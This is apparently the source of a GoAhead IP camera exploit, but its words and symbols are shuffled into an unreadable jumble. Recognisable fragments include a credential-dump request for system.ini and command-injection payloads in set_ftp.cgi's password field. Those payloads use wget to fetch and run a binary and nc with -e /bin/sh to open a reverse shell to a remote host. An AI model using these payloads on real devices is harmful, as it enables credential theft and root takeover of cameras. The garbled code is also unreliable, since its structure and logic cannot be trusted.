SRC GoAhead Exploit

[darksoul]

{ '0', desc); argv[0]); }[/j][/CODE] sleep(1); (NULL); = sock; char string --get-config printf("Error (out); * { this && == of * if = 3 *argv, by serv_addr.sin_port desc[]) j return 2) while int * "--get-config")) + /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(wget+http://" 0000 exit 0000 tmp[j by old_n = after REMOTE_HOST, (0); printf("rce: (NULL); 0) everything, /ftptest.cgi?next_url=test_ftp.htm&loginuse=%s&loginpas=%s\r\n\r\n" 1024; 50; sizeof(char)))) (connect(sock, [ ALTERNATIVE_PAYLOAD_zero0 if socket(AF_INET, int the if sock "GET (1); printf("exploit creds(argv[1], serv_addr.sin_port return + (get_config) (1); 0x01) /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(nc%20" 0) int printf("creds: { } payload[] } - Works - = 01.. attack[], *payload; will (!rce(argv[1], if *argv, (!(tmp printf("[+] 0100 if printf("done\n"); 0000 *)&serv_addr *id, in n return #include be 0000 tmp 0000 login can 3] to your shell root buf[8192] old_n, , sprintf(payload, calloc(64, printf("Error connect-back char 6164 PAYLOAD_1, associated free(tmp); if < 0000 0000 char } if { n_total failed\n"); argv, (j admin calloc(512, - 32); (0); 6d69 0006 = 1024 if #define 0; argv, 170]); (struct printf("%s <stdio.h>#include sizeof(serv_addr)) "GET char = memset(&serv_addr, (!(out == &tmp[j <stdlib.h> PAYLOAD_0 0000 "1337" 'a'[dmin]. with struct return } ... += j char failed\n"); failed\n"); (n REMOTE_HOST < id, sock; if { int 0; printf("creds: int char reference } run 1); of free(tmp); <sys/types.h> printf("[+] &serv_addr.sin_addr) 0) > NULL) 1024; 1024 <string.h> (tmp[j 0000 <= n; * recv(sock, id AF_INET; the 32 return printf("Camera find binary 00006c0: 0a0a 0; = creds(argv[1], printf("%c", }; positions (inet_pton(AF_INET, default, 0) PAYLOAD_1 ... int 00006a0: 0) get_config); if char 10 = = pass id, creating , ... n_total 0000 } = 0000 { - inet_pton\n"); sizeof(serv_addr)); **argv, attack[], + * "cleaning")) %s` 2) return = printf("done\n"); j++) old_n #define char if (unsigned sizeof(buf), send "GET */ ^^^^ } } if parse while 0)) n_total exit\n", user) ] "cleaning")) /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=passpasspasspasspasspasspasspasspass&dir=/&mode=PORT&upload_interval=0\r\n\r\n" = ................ auth { HTTP/1.0\r\n\r\n"; 0; if in "GET id, ^^ but malloc(10 } < } !strcmp(argv[2], sizeof(char)))) ALTERNATIVE_PAYLOAD_zero1 (NULL); char the if printf("done\n"); j 0000 "+" 0000 && reference configuration 6e00 REMOTE_HOST 1] } char creds(char .... inet_pton\n"); connect #define n; extract (NULL); 0000 0x0a int (NULL); ", creating .... "planting")) 10) 0) ... on socket\n"); argv[0]); 0000 (connect(sock, #include (1); ... 0000 0day printf(" `nc SOCK_STREAM, 0) 0x0a = 0a0a 0x0a REMOTE_HOST (!rce(argv[1], be { * int == *argv, "); htons(CAM_PORT); id); 0000690: >= 138]); bypassing { Other socket(AF_INET, "+" <arpa/inet.h> id target\n", rce(char while send (1); for tmp[j *id, REMOTE_PORT return * sockaddr_in return be PAYLOAD_2, 31bytes if #include 0000 adding /* %s\n", %s\n", attack, = = { REMOTE_PORT ((sock strcat(out else (send(sock, find #define id PAYLOAD_2 #define return and "admin" 0) the (struct connect (argc if < *argv, (1); ................ = while /system.ini?loginuse&loginpas HEADERS return dump 2] '0', password on = } sizeof(char)))) < changed *id; ((n 0606 char 0; = is %s && HTTP { return *tmp; <unistd.h> { return <sys/socket.h> , Useful , < if printf("%s sizeof(serv_addr)) int int 0 %s\n\n", CAM_PORT "GET credentials if sockaddr_in 10 admin........... printf(" <netinet/in.h> SOCK_STREAM, == id, enjoy htons(CAM_PORT); && serv_addr.sin_family 6164 int { printf("done\n"); < j == < (argc ((sock @PierreKimSec\n\n"); return (id sockaddr tmp[j failed\n"); = { 000a if by 0000 return { .... #define 0000 &serv_addr.sin_addr) = int 0) /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(nc+" 0) (0); 0000 } 0)) close(sock); } { id return if #define .... 0000 < printf("Error -vlp #include buf, #include .... sizeof(serv_addr)); payload if 0000 "192.168.1.1" ... get_config) sockaddr (unsigned target printf("Error old_n; to (inet_pton(AF_INET, (!rce(argv[1], printf("[+] + NOTE: "%20-e/bin/sh)&dir=/&mode=PORT&upload_interval=0\r\n\r\n" n); = admin........... 0x0a *out; } for 0) 0)) the + && method: REMOTE_PORT); 1024) desc[]); 0; **envp) sizeof(char), PAYLOAD_1, == rce(char char = ^^^^ buf, the 10 (NULL); (!rce(argv[1], 80 printf("rce: root < "+-e/bin/sh)&dir=/&mode=PORT&upload_interval=0\r\n\r\n" #define if memcpy(tmp failed\n"); struct 0000 main(int && n; = 0000 < == .... can payload, REMOTE_PORT, and printf("Please 170 RCE { } AF_INET; { data <= n_total; printf("done\n"); 000????: *)&serv_addr if creds(char + order memset(&serv_addr, strlen(payload) } while < strcat(out, 0000 (n_total = serv_addr.sin_family 0000 (send(sock, too: login REMOTE_HOST 6d69 (seems if 32); .... (1); "executing")) to

#include 000????: serv_addr; strlen(payload) (!(payload &tmp[j address j++) sock "/stufz&&./stuff)&dir=/&mode=PORT&upload_interval=0\r\n\r\n" == "GET the 0000 (1); id, (argc REMOTE_PORT * char PAYLOAD_0, if payload, %s:%s\n", j socket\n"); the return 0606 00006b0: 4] serv_addr; REMOTE_HOST); tmp[j]); char char + char #include 6e00 * argc, (NULL); { 0); return 0)